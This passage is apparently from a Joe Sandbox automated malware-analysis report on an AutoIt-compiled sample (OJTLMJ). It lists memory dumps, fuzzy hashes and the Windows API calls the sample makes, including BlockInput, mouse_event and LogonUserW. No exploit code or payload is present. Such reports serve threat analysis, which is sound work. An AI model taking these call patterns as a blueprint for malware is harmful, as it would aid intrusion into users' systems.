                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharUpper
                                                                                                                • String ID:
                                                                                                                • API String ID: 3964851224-0
                                                                                                                • Opcode ID: 206217076f3e98c1e34fdc1fd552066971160a1ea9c3445517762541a722598d
                                                                                                                • Instruction ID: e1e350e04762e6cc4d395757ecbe0c9aec9b4daa826dc964726e9d75fa6724b9
                                                                                                                • Opcode Fuzzy Hash: 206217076f3e98c1e34fdc1fd552066971160a1ea9c3445517762541a722598d
                                                                                                                • Instruction Fuzzy Hash: D2925870608341CFDB24DF18C484B6AB7E1FF89345F18885DED8A8B292D775E949CB62
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c31274f007d77be7306e79f4ea79ea8d56968438353e12316f2bcd61ddf01a61
                                                                                                                • Instruction ID: cd88625d18c7e562fa5fef2153b0611dc702076235f17ccc515ac0087491480d
                                                                                                                • Opcode Fuzzy Hash: c31274f007d77be7306e79f4ea79ea8d56968438353e12316f2bcd61ddf01a61
                                                                                                                • Instruction Fuzzy Hash: 2C321535D29F414ED7239634C822336A789EFB73C4F15D737E81AB5AA6EB29C4835120
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 58399b9764c397c7780095e770183379f76ae4cf43470a0fe2bd342ebbd09702
                                                                                                                • Instruction ID: 05d61797acaef18600a286781d8e8e40d4c2cd8ad66bdb1614a9858a48a464a0
                                                                                                                • Opcode Fuzzy Hash: 58399b9764c397c7780095e770183379f76ae4cf43470a0fe2bd342ebbd09702
                                                                                                                • Instruction Fuzzy Hash: 48B10520D2AF514DD72396399831336B75CAFBB2C6F91D71BFC1AB4E26EB2185834180
                                                                                                                APIs
                                                                                                                • __time64.LIBCMT ref: 00D8BFCB
                                                                                                                  • Part of subcall function 00D640DA: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00D8C6AF,00000000,?,?,?,?,00D8C85C,00000000,?), ref: 00D640E3
                                                                                                                  • Part of subcall function 00D640DA: __aulldiv.LIBCMT ref: 00D64103
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                • String ID:
                                                                                                                • API String ID: 2893107130-0
                                                                                                                • Opcode ID: 353a25f76995d425ff6fbedba226779500a72814bbe995ea12ca318c289efc75
                                                                                                                • Instruction ID: 88a3f3c28e034d0a088ab517692109eb6cfcc80539966626ac32542828ec0a4e
                                                                                                                • Opcode Fuzzy Hash: 353a25f76995d425ff6fbedba226779500a72814bbe995ea12ca318c289efc75
                                                                                                                • Instruction Fuzzy Hash: A7218172634510CFC729CF39C881A52B7E5EB95321B284E6DE0E5CF2C0CA75B949CB64
                                                                                                                APIs
                                                                                                                • BlockInput.USER32(00000001), ref: 00D97057
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BlockInput
                                                                                                                • String ID:
                                                                                                                • API String ID: 3456056419-0
                                                                                                                • Opcode ID: ef11606f15dd3c5880fbac0ac2e97af120d1e84096366291b6265b14fbca5a7c
                                                                                                                • Instruction ID: 91b3899a1cc16eaceb960ad085ebd38d9e9cb3e4891cebb8296fc125177264f0
                                                                                                                • Opcode Fuzzy Hash: ef11606f15dd3c5880fbac0ac2e97af120d1e84096366291b6265b14fbca5a7c
                                                                                                                • Instruction Fuzzy Hash: 72E048356142055FCB10DFA9D804D96F7EDDF94750F048426FE49D7351EAB0E8049BB0
                                                                                                                APIs
                                                                                                                • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00D87DF8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: mouse_event
                                                                                                                • String ID:
                                                                                                                • API String ID: 2434400541-0
                                                                                                                • Opcode ID: 5afa2b17dae2494d4f70671ae9f8c38a198d7d7f478a353dd68c3560c0b9b8e3
                                                                                                                • Instruction ID: 48199ecfbcdfd0bee34996c8d4fafaddad281cb18e8e88fdca5197bfd68387cd
                                                                                                                • Opcode Fuzzy Hash: 5afa2b17dae2494d4f70671ae9f8c38a198d7d7f478a353dd68c3560c0b9b8e3
                                                                                                                • Instruction Fuzzy Hash: 47D05EA217C206F9FD1827209C2FF3A2108EB01780FB94249B051C60C1EC94E8006638
                                                                                                                APIs
                                                                                                                • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00D7BA6A), ref: 00D7BEB3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LogonUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 1244722697-0
                                                                                                                • Opcode ID: 870ceb45b1777c637732646be26a29739f34fc1a52fa88ed34c2d9a5162745dd
                                                                                                                • Instruction ID: 3f109c93c9b53b0c5ee15917542ad7dfdc9688447e96c414d78b73afa66f7a5e
                                                                                                                • Opcode Fuzzy Hash: 870ceb45b1777c637732646be26a29739f34fc1a52fa88ed34c2d9a5162745dd
                                                                                                                • Instruction Fuzzy Hash: E1D09E321A464EAEDF025FA4DC06EAE3F6AEB04701F448511FA15D51A1C675D532AB60
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: NameUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 2645101109-0
                                                                                                                • Opcode ID: ce95691c546d297efe933e28c1415d86b162d95e12c312661f83ed83f6142bcd
                                                                                                                • Instruction ID: 7bb55d411ae669d15c8b1750d8b3eb6c4c24f35dcf68f0b7895ef79b4db59036
                                                                                                                • Opcode Fuzzy Hash: ce95691c546d297efe933e28c1415d86b162d95e12c312661f83ed83f6142bcd
                                                                                                                • Instruction Fuzzy Hash: 9EC002B180410ADBC715CB84C9459EAB6BCAB04300F104096A156E1100D7B09A459B71
                                                                                                                APIs
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00D68E1F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                • String ID:
                                                                                                                • API String ID: 3192549508-0
                                                                                                                • Opcode ID: dae4ff67a18b5e0abde2cbf80ff778c6fb846c85db5a258a955490a7e5fd8269
                                                                                                                • Instruction ID: 083ace20520c2eb751412dd27c09f5f6886fb11c342136abfb2ea61143a88f63
                                                                                                                • Opcode Fuzzy Hash: dae4ff67a18b5e0abde2cbf80ff778c6fb846c85db5a258a955490a7e5fd8269
                                                                                                                • Instruction Fuzzy Hash: F7A0123000060DA78A001B51EC048447F5DD6441507014020F40C40121873354104991
                                                                                                                APIs
                                                                                                                • GetProcessHeap.KERNEL32(00D66AE9,00DF67D8,00000014), ref: 00D6A937
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 54951025-0
                                                                                                                • Opcode ID: 0bf6fe9d164d683248102ace3b2a2c103247773c5a7d2c82691f7599671eaf2f
                                                                                                                • Instruction ID: 4d2ee87f4f8522cf4ed224f8d64bf1f5eb9496d483508b2583e1dd441521e91f
                                                                                                                • Opcode Fuzzy Hash: 0bf6fe9d164d683248102ace3b2a2c103247773c5a7d2c82691f7599671eaf2f
                                                                                                                • Instruction Fuzzy Hash: 62B012B03033034FD7084B3DAC5461A39D597C9101345403D7003C2660DB308450DF00
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                • Instruction ID: 967a305108b6a40c32d0cb30670f490eeb5f99ad2db8f52a02bd15fa20461f78
                                                                                                                • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                • Instruction Fuzzy Hash: 8BC180762052A34BDF2D867AC43553FBEA15EA27B131E076DE8B2CB4C4EE24C564D630
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                • Instruction ID: 312ad417e7a7f58400f284a96eaf744f66b2dc4e4722f2d438b6918867c65232
                                                                                                                • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                • Instruction Fuzzy Hash: 21C18D7A2051A34BDF2D867AC43443FBEA15AA27B131E076DD8B3CB5D4EE24D528D630
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                • Instruction ID: c9d70cd61639dbe86a6eaa8f9993d850a2fa88211d8b7a803949afe3195e971a
                                                                                                                • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                • Instruction Fuzzy Hash: C8C19F722052A34BDF2D867E843443FBEA19AA27B531E076DE4B3CB4C5EE24D524D630
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                • Instruction ID: 7df0e2bd2faee1c18dd28e57f4b229a2e7bb8c57e2a87c5863cb96d788f8100c
                                                                                                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                • Instruction Fuzzy Hash: E6C19E722092934BEF2D867A843443FBFA15AA27B131E076ED4B3CB5C5EE24D524D670
                                                                                                                APIs
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00D9A7A5
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00D9A7B7
                                                                                                                • DestroyWindow.USER32 ref: 00D9A7C5
                                                                                                                • GetDesktopWindow.USER32 ref: 00D9A7DF
                                                                                                                • GetWindowRect.USER32(00000000), ref: 00D9A7E6
                                                                                                                • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00D9A927
                                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00D9A937
                                                                                                                • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D9A97F
                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00D9A98B
                                                                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00D9A9C5
                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D9A9E7
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D9A9FA
                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D9AA05
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00D9AA0E
                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D9AA1D
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00D9AA26
                                                                                                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D9AA2D
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00D9AA38
                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D9AA4A
                                                                                                                • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00DCD9BC,00000000), ref: 00D9AA60
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00D9AA70
                                                                                                                • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00D9AA96
                                                                                                                • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00D9AAB5
                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D9AAD7
                                                                                                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00D9ACC4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                • API String ID: 2211948467-2373415609
                                                                                                                • Opcode ID: c070fc7c3713139efce10cd9f443cf7680925d3ad6f6ff75d20833eddcb57c17
                                                                                                                • Instruction ID: 465500b48b424c753088b7599ac5a728d6573e0baf1a185eb9125c4a31e48497
                                                                                                                • Opcode Fuzzy Hash: c070fc7c3713139efce10cd9f443cf7680925d3ad6f6ff75d20833eddcb57c17
                                                                                                                • Instruction Fuzzy Hash: 7D024D7590021AAFDF14DFA9CD89EAE7BB9EB48310F148159F915EB2A0D730AD41CB70
                                                                                                                APIs
                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00DAD0EB
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00DAD11C
                                                                                                                • GetSysColor.USER32(0000000F), ref: 00DAD128
                                                                                                                • SetBkColor.GDI32(?,000000FF), ref: 00DAD142
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 00DAD151
                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 00DAD17C
                                                                                                                • GetSysColor.USER32(00000010), ref: 00DAD184
                                                                                                                • CreateSolidBrush.GDI32(00000000), ref: 00DAD18B
                                                                                                                • FrameRect.USER32(?,?,00000000), ref: 00DAD19A
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00DAD1A1
                                                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 00DAD1EC
                                                                                                                • FillRect.USER32(?,?,00000000), ref: 00DAD21E
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00DAD249
                                                                                                                  • Part of subcall function 00DAD385: GetSysColor.USER32(00000012), ref: 00DAD3BE
                                                                                                                  • Part of subcall function 00DAD385: SetTextColor.GDI32(?,?), ref: 00DAD3C2
                                                                                                                  • Part of subcall function 00DAD385: GetSysColorBrush.USER32(0000000F), ref: 00DAD3D8
                                                                                                                  • Part of subcall function 00DAD385: GetSysColor.USER32(0000000F), ref: 00DAD3E3
                                                                                                                  • Part of subcall function 00DAD385: GetSysColor.USER32(00000011), ref: 00DAD400
                                                                                                                  • Part of subcall function 00DAD385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00DAD40E
                                                                                                                  • Part of subcall function 00DAD385: SelectObject.GDI32(?,00000000), ref: 00DAD41F
                                                                                                                  • Part of subcall function 00DAD385: SetBkColor.GDI32(?,00000000), ref: 00DAD428
                                                                                                                  • Part of subcall function 00DAD385: SelectObject.GDI32(?,?), ref: 00DAD435
                                                                                                                  • Part of subcall function 00DAD385: InflateRect.USER32(?,000000FF,000000FF), ref: 00DAD454
                                                                                                                  • Part of subcall function 00DAD385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00DAD46B
                                                                                                                  • Part of subcall function 00DAD385: GetWindowLongW.USER32(00000000,000000F0), ref: 00DAD480
                                                                                                                  • Part of subcall function 00DAD385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00DAD4A8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
